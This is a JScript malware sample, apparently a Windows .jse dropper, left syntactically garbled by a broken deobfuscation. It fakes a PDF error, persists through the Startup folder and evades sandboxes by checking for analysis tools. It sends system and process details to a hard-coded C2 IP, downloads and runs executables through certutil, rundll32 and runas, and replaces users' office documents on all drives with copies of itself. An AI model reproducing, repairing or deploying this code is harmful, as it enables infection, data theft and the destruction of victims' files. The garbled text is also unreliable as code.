v1967arms35t = false;
v1967muffled34t = true;

function ulrich(t, y, u)
{
	return u['len' + 'gth'];
};
v1967might46t = false;
v1967difficulty8t = false;
v1967open69t = false;
v1967just23t = true;
v1967word39t = false;
v1967sleepiness60t = true;
'Indians38'; = false;
v1967back25t = true;
v1967inbed39t = true;
v1967thewisdom63t = true;
v1967chose72t = false;
var 'undefined'; = 'undefined';
var this["Enumerator"]; = this["Enumerator"];
var [415, = [415, 14];
var this["ActiveXObject"]; = this["ActiveXObject"];
var 'grandsons7'; = 'grandsons7';
var this["WScript"]; = this["WScript"];
var false; = false;
var v1967thedoctors13["ScriptFullName"]; = this["WScript"];["ScriptFullName"];
var 'They47'; = 'They47';
var this["GetObject"]; = this["GetObject"];
var 'undefined'; = 'undefined';
var new = new this["ActiveXObject"];("Scripting.FileSystemObject");
var { = {
	X: 75
};
var v1967thedoctors13["CreateObject"]("WScript.Shell"); = this["WScript"];["CreateObject"]("WScript.Shell");
var 'undefined'; = 'undefined';
var new = new this["ActiveXObject"];("ADODB.Stream");
var null; = null;
var new = new this["ActiveXObject"];("Shell.Application");
var null; = null;
var new = new this["ActiveXObject"];("Msxml2.ServerXMLHTTP");
var 'Indians38'; = 'Indians38';
var String["fromCharCode"](92); = String["fromCharCode"](92);
var 'childrenIn85'; = 'childrenIn85';
var v1967seemed82["ExpandEnvironmentStrings"]("%USERPROFILE%"); = v1967thedoctors13["CreateObject"]("WScript.Shell");["ExpandEnvironmentStrings"]("%USERPROFILE%");
var 0.581; = 0.581;
var String["fromCharCode"](34); = String["fromCharCode"](34);
var { = {
	Z: 85
};
var v1967seemed82["ExpandEnvironmentStrings"]("%TEMP%"); = v1967thedoctors13["CreateObject"]("WScript.Shell");["ExpandEnvironmentStrings"]("%TEMP%");
var 'undefined'; = 'undefined';
var Math["floor"]((Math["random"]() = Math["floor"]((Math["random"]() * (639)) + 1);
var true; = true;
var v1967little22["NameSpace"](7); = new["NameSpace"](7);
var 'undefined'; = 'undefined';
var v1967tohis29 = String["fromCharCode"](92); + "fb.jse";
var { = {
	V: 77
};
var "URL_KEYadd=2097d7b063d6f8b5cc803abf3df758aa"; = "&add=2097d7b063d6f8b5cc803abf3df758aa";
var [42, = [42, 448];
var "https = "https://185.130.104.235/1/net500.php";
var 'thirst29'; = 'thirst29';
var '?v1967other58=new'; = '?'?v1967other58=new';=new';
var [498, = [498, 546];
var v1967thelittle22 = "https + '?v1967other58=new';;
var [67, = [67, 54];
var true; = true;
var 0.416; = 0.416;
var true; = true;
var null; = null;
var true; = true;
var null; = null;
var ''; = '';
var null; = null;
var false; = false;
var 'Indians38'; = 'Indians38';
var ''; = '';
var 'childrenIn85'; = 'childrenIn85';
var 1; = 1;
var 0.581; = 0.581;
var 0; = 0;
var { = {
	Z: 85
};
var 0; = 0;
var 'undefined'; = 'undefined';
var 0; = 0;
var true; = true;
var 0; = 0;
var 'undefined'; = 'undefined';
var 3; = 3;
var { = {
	V: 77
};
var false; = false;
var [42, = [42, 448];
var null; = null;
var 'thirst29'; = 'thirst29';
var null; = null;
var [498, = [498, 546];
var false; = false;
var [67, = [67, 54];
var null; = null;
var 0.416; = 0.416;
var "MZ"; = "MZ";
var null; = null;
var "POST"; = "POST";
var null; = null;
var null; = null;
var null; = null;
var null; = null;
var 'Indians38'; = 'Indians38';
var null; = null;
var 'childrenIn85'; = 'childrenIn85';
var startupFolder["Self"]["Path"] = v1967little22["NameSpace"](7);["Self"]["Path"] + v1967tohis29;
var 0.581; = 0.581;
var auto90989r = startupFolder["Self"]["Path"] + v1967seemed82["ExpandEnvironmentStrings"]("%TEMP%");;
var { = {
	Z: 85
};
var ("2070000") = ("2070000") * 1;
var 'undefined'; = 'undefined';
var "-f = "-f -decode ";
var true; = true;
var ("4294967295") = ("4294967295") * 1;
var 'undefined'; = 'undefined';
var null; = null;
var { = {
	V: 77
};
var null; = null;
var [42, = [42, 448];
var hashhere; = 0;;
var 'thirst29'; = 'thirst29';
var null; = null;
var [498, = [498, 546];
var hashhere; = 0;;
var [42, = [42, 448];
var hashhere;2 = null;
var 0.416; = 0.416;
var ''; = '';
var null; = null;
var ''; = '';
var null; = null;
var ''; = '';
var null; = null;
var ''; = '';
var 'Indians38'; = 'Indians38';
var ''; = '';
var 'childrenIn85'; = 'childrenIn85';
var v1967there93["Drives"]; = new["Drives"];
var 0.581; = 0.581;
var null; = null;
var { = {
	Z: 85
};
var null; = null;
var 'undefined'; = 'undefined';
var "*.doc = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd";
var true; = true;
var 1; = 1;
var 'undefined'; = 'undefined';
var "Lafamiliaestodo.txt"; = "Lafamiliaestodo.txt";
var { = {
	V: 77
};
var null; = null;
var [42, = [42, 448];
var null; = null;
var 'thirst29'; = 'thirst29';
var -1; = -1;
var [498, = [498, 546];
var 1; = 1;
var [67, = [67, 54];
var 4; = 4;
var 0.416; = 0.416;
var 40; = 40;
var null; = null;
var 7; = 7;
var null; = null;
var 16; = 16;
var null; = null;
var "Error"; = "Error";
var 'Indians38'; = 'Indians38';
var "The = "The document provided as a PDF source was invalid.";
var 'childrenIn85'; = 'childrenIn85';
var 0; = 0;
var 0.581; = 0.581;
var false; = false;
try
{
	if (v1967thedoctors13["ScriptFullName"]; != startupFolder["Self"]["Path"])
	{
		null; = new["OpenTextFile"](v1967thedoctors13["ScriptFullName"];, 1;, false, 0);
		null; = null;["ReadLine"]();
		null;["Close"]();false; = true;
		if (true;) v1967thedoctors13["CreateObject"]("WScript.Shell");["Popup"]("The, 10, "Error";, 16;);
		if (new["FileExists"](startupFolder["Self"]["Path"]))
		{
			this["WScript"];["Quit"];
		}
	}
	else
	{}
}
catch (voeaPLkmnB)
{
	v1967thedoctors13["CreateObject"]("WScript.Shell");["Popup"]("The, 5, "Error";, 16;);
}
while (16;)
{
	"The = "low";1; = 1; + 1;
	if (1; == ("2070000"))
	{
		try
		{null; = this["GetObject"];("winmgmts:{impersonationLevel=impersonate}!" + String["fromCharCode"](92); + String["fromCharCode"](92); + "." + String["fromCharCode"](92); + "root" + String["fromCharCode"](92); + "cimv2");
			hashhere; = new this["Enumerator"];(null;["ExecQuery"]("Select * from Win32_Process"));
			hashhere;2 = new this["Enumerator"];(null;["ExecQuery"]("Select * from Win32_OperatingSystem"));
			while (!hashhere;2["atEnd"]())
			{
				if (0; == 5) break;''; = ''; + hashhere;2["item"]()["Caption"] + hashhere;2["item"]()["Version"];0;++;
				hashhere;2["moveNext"]();
			}''; = ''; + String["fromCharCode"](13) + String["fromCharCode"](10) + startupFolder["Self"]["Path"];0; = 0;
			while (!hashhere;["atEnd"]())
			{
				if (0; == 200) break;
				null; = hashhere;["item"]();''; = ''; + null;["Name"] + "*" + null;["ExecutablePath"] + String["fromCharCode"](13) + String["fromCharCode"](10);0;++;
				hashhere;["moveNext"]();
			}
		}
		catch (voeaPLkmnB)
		{}
		try
		{auto90989r = auto90989r + '';;
			for (0; = 0; 0; < auto90989r["length"]; 0;++)
			{0; = (((0; << (5)) - 0;) + auto90989r["charCodeAt"](0;)) & ("4294967295");
			}
			if (startupFolder["Self"]["Path"]["indexOf"](String["fromCharCode"](92); + "AppData" + String["fromCharCode"](92);) == -1)
			{
				0; = 10;
			}
			else
			{
				0; = 20;
			}
		}
		catch (voeaPLkmnB)
		{0; = 999999;
		}''; = ''; + String["fromCharCode"](13) + String["fromCharCode"](10) + '';;
		if ('';["length"] < 500 || '';["indexOf"]("Procmon") != -1; || '';["indexOf"]("Wireshark") != -1; || '';["indexOf"]("Temp" + String["fromCharCode"](92); + "iexplore.exe") != -1; || '';["indexOf"]("ProcessHacker") != -1; || '';["indexOf"]("vmtoolsd") != -1; || '';["indexOf"]("VBoxService") != -1; || '';["indexOf"]("python") != -1; || '';["indexOf"]("Proxifier.exe") != -1; || '';["indexOf"]("Johnson") != -1; || '';["indexOf"]("ImmunityDebugger.exe") != -1; || '';["indexOf"]("lordPE.exe") != -1; || '';["indexOf"]("ctfmon.exe*JOHN-PC") != -1; || '';["indexOf"]("BehaviorDumper") != -1; || '';["indexOf"]("anti-virus.EXE") != -1; || '';["indexOf"]("AgentSimulator.exe") != -1; || '';["indexOf"]("VzService.exe") != -1; || '';["indexOf"]("VBoxTray.exe") != -1; || '';["indexOf"]("VmRemoteGuest") != -1; || '';["indexOf"]("SystemIT|admin") != -1; || '';["indexOf"]("WIN7-TRAPS") != -1; || '';["indexOf"]("Emily" + String["fromCharCode"](92); + "AppData") != -1; || '';["indexOf"]("PROCMON") != -1; || '';["indexOf"]("procexp") != -1; || '';["indexOf"]("tcpdump") != -1; || '';["indexOf"]("FrzState2k") != -1; || '';["indexOf"]("DFLocker64") != -1; || '';["indexOf"]("vmware") != -1;)
		{
			pdfdoc["alert"]("No more half-measures.");
			this["WScript"];["Quit"];false; = true;
		}
		try
		{
			if (false; && true;)
			{
				null; = new["CreateTextFile"](startupFolder["Self"]["Path"], true, false);
				null;["WriteLine"](null;);
				null;["Close"]();
			}
		}
		catch (voeaPLkmnB)
		{}
		while (7;)
		{
			try
			{
				''; = v1967seemed82["ExpandEnvironmentStrings"]("%TEMP%"); + String["fromCharCode"](92); + Math["floor"]((Math["random"]() * (840)) + 1) + Math["floor"]((Math["random"]() * (712)) + 1) + ".exe";
				''; = v1967seemed82["ExpandEnvironmentStrings"]("%TEMP%"); + String["fromCharCode"](92); + Math["floor"]((Math["random"]() * (888)) + 1) + Math["floor"]((Math["random"]() * (900)) + 1) + ".mtm";
				new["setOption"](3;, "MSXML");
				null; = v1967thelittle22 + "URL_KEYadd=2097d7b063d6f8b5cc803abf3df758aa"; + "&u=" + Math["abs"](0;) + "&o=" + 0; + "&v=" + 0; + "&s=" + Math["floor"]((Math["random"]() * (998)) + 1) + Math["floor"]((Math["random"]() * (888)) + 1) + Math["floor"]((Math["random"]() * (590)) + 1);
				new["open"]("POST";, null;, false);
				new["send"]('';);
				if (new["status"] == 200)
				{
					if (0; == 0)
					{
						null; = new["responseText"];
						try
						{
							if (new["getResponseHeader"]("I_am_the_danger") == '0')
							{
								''; = startupFolder["Self"]["Path"];
								-1; = 0;
							}
						}
						catch (voeaPLkmnB)
						{}
						try
						{
							if (new["getResponseHeader"]("I_am_the_danger") == "1") -1; = 1;
						}
						catch (voeaPLkmnB)
						{}
						try
						{
							if (new["getResponseHeader"]("I_am_the_danger") == "2") -1; = 2;
						}
						catch (voeaPLkmnB)
						{}
						try
						{
							if (new["getResponseHeader"]("Content-Transfer-Encoding") == "binary")
							{
								new["Open"]();
								new["Type"] = 1;
								new["Write"](new["responseBody"]);
								new["Position"] = 0;
								new["SaveToFile"]('';, 2);
								new["Close"]();
							}
							else
							{
								if (null;.length > 10)
								{
									null; = new["CreateTextFile"]('';, true, false);
									null;["WriteLine"](null;);
									null;["Close"]();
									this["WScript"];["Sleep"](6000);
									new["ShellExecute"]("certutil", "-f + ''; + " " + String["fromCharCode"](34); + ''; + String["fromCharCode"](34);, '', "open", 0);
								}
							}
						}
						catch (voeaPLkmnB)
						{}
					}
					else
					{0; = 0;
						continue;
					}
					if (-1; == 0)
					{
						this["WScript"];["Sleep"](50000);
						-1; = -1;0; = 9;
						continue;
					}
					this["WScript"];["Sleep"](25000);
					if (!new["FileExists"]('';) && true;)
					{
						try
						{null; = new this["Enumerator"];(v1967there93["Drives"];);
							for (; !null;["atEnd"]();null;["moveNext"]())
							{null; = null;["item"]();
								if ((null;["IsReady"] && (null;["DriveType"] == 3 || null;["DriveType"] == 1)) && v1967seemed82["ExpandEnvironmentStrings"]("%USERPROFILE%");["substring"](0, 1) != null;["DriveLetter"])
								{
									new["ShellExecute"]("cmd", "/U /Q /C cd /D " + null;["DriveLetter"] + ": && dir /b/s/x " + "*.doc + ">>%TEMP%\\" + "Lafamiliaestodo.txt";, '', "open", 0);
									this["WScript"];["Sleep"](1000 * 60);
								}
							}
							this["WScript"];["Sleep"](1000 * 40);
							null; = new["GetFile"](v1967seemed82["ExpandEnvironmentStrings"]("%TEMP%"); + String["fromCharCode"](92); + "Lafamiliaestodo.txt";)["OpenAsTextStream"](1, -1);
							while (!null;["AtEndOfStream"])
							{
								''; = null;["ReadLine"]();
								''; = '';["substring"](0, '';["indexOf"]("."));
								new["ShellExecute"]("cmd", "/U /Q /C copy /Y " + String["fromCharCode"](34); + startupFolder["Self"]["Path"] + String["fromCharCode"](34); + " " + String["fromCharCode"](34); + ''; + ".jse" + String["fromCharCode"](34); + " && del /Q/F " + String["fromCharCode"](34); + ''; + String["fromCharCode"](34);, '', "open", 0);
							}
							null;["Close"]();
							new["DeleteFile"](v1967seemed82["ExpandEnvironmentStrings"]("%TEMP%"); + String["fromCharCode"](92); + "Lafamiliaestodo.txt";);
						}
						catch (voeaPLkmnB)
						{}0; = 0;
						continue;
					}
					null; = new["GetFile"]('';)["OpenAsTextStream"](1);
					''; = null;["ReadLine"]()["substring"](0, 2);
					null;["Close"]();
					if (''; == "MZ"; && 0; == 0)
					{
						try
						{
							switch (-1;)
							{
							case -1:
								new["ShellExecute"]("cmd", String["fromCharCode"](40; + 7;) + "c start " + '';, '', "open", 0;);0; = 45;
								break;
							case 0:
								new["ShellExecute"]("cmd", String["fromCharCode"](40; + 7;) + "c start " + '';, '', "open", 0;);0; = 46;
								break;
							case 1:
								new["ShellExecute"]("rundll32", String["fromCharCode"](34); + ''; + String["fromCharCode"](34); + " secretFunction", '', "open", 0;);0; = 47;
								break;
							case 2:
								new["ShellExecute"]("taskkill", "/f /t /im chrome.exe", '', "open", 0);
								new["ShellExecute"]('';, "/silent /install", '', "runas", 1);0; = 48;
								break;
							}
						}
						catch (voeaPLkmnB)
						{0; = 8888;
						}
						this["WScript"];["Sleep"](11000);
					}
				}
			}
			catch (voeaPLkmnB)
			{}
			this["WScript"];["Sleep"](70000);
		};
	};
};
'childrenIn85'; = 0.96;
v1967there14t = 0.581;
v1967although19t = 0.185;
v1967only8t = 0.949;
v1967noticeable76t = 0.281;
v1967well48t = 0.831;